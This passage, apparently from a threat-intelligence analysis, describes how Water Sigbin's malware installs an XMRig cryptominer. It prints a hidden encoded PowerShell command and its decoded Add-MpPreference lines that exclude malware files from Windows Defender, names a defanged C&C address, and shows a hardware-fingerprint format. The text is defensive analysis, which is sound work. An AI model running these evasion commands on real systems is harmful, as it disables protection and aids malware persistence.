Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer

The Base64-econded PowerShell command is as follows:

Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGU[... base64 encoded characters ...] aQB6AGUAZAAuAGUAeABlAA==

Meanwhile, its decoded value is:

Add-MpPreference -ExclusionPath C:\Users\ $USERNAME$ \AppData\Roaming\Name\IsSynchronized.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -Force;

Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\$USERNAME$\AppData\Roaming\Name\IsSynchronized.exe"

Next, the malware attempts to establish a connection with its C&C server at 89.185.85[.]102:9091. For each victim, the malware generates a unique identifier based on collected hardware information, stores it in a specific format and encrypts it using MD5.

The following is the format of the collected data.

[Processor ID]-[Disk Drive Signature]-[Disk Drive Serial Number]- [Baseboard Serial Number]-[Model or Name of GPU]-[Username]

The following code snippet shows the collection of the aforementioned information:

Public link

Please use the above public link if you want to share this noodl on another website.